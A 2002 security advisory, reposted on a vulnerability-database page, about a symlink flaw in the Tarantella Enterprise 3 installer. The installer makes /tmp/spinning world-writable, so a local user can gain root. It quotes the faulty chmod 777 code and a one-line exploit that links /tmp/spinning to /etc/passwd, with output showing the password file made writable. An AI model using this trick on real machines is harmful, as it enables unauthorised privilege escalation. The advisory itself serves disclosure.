Tarantella Enterprise 3 local root during installation

2018.09.27
Risk: Medium
Local: Yes
Remote: No
CWE: N/A


CVSS Base Score: 1.2/10
Impact Subscore: 2.9/10
Exploitability Subscore: 1.9/10
Exploit range: Local
Attack complexity: High
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

Title: Another local root during installation of Tarantella Enterprise 3 Author: Larry W. Cashdollar, @_larry0 Date: 2002-01-14 CVE-ID:[CVE-2002-0296] Download Site: http://www.tarantella.com/download Vendor: http://www.tarantella.com Vendor Notified: 2002-01-14 Vendor Contact: unkown Advisory: http://www.vapid.dhs.org/advisories/tarentella_enterprise_3_symlink_attack.html Description: Tarantella, a supplier of Internet infrastructure software, has released Tarantella Enterprise 3, version 3.2, positioned as a managed, secure application access product that provides authorization, authentication, and accountability for enterprise systems. The software supplies integrated, managed, and secure access to server-based applications through a Web browser. This iteration of the Tarantella software focuses on security, performance, and network optimization while allowing fast and simple integration with existing corporate infrastructures. Vulnerability: During installation a "twirling / \ | - " text graphic is displayed (you remember them from the shareware games in DOS days..) they create a file in /tmp called spinning to determine at what state the installation is at. The files permissions are changed toread write excute for all, removed and recreated during different stages of the installation. It is vulnerabile to a simple symlink attack. Problem Code: <----snip----> touch /tmp/spinning >/dev/null 2>&1 chmod 777 /tmp/spinning >/dev/null 2>&1 <----snip----> Export: JSON TEXT XML Exploit Code: Exploit There is no race condition here, just create the link. [lwc@misery] ln -s /etc/passwd /tmp/spinning Wait until root is done installing... [lwc@misery] ls -l /etc/passwd - -rwxrwxrwx 1 root root 1094 Feb 18 22:39 /etc/passwd

References:

http://www.vapidlabs.com/advisory.php?v=45


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top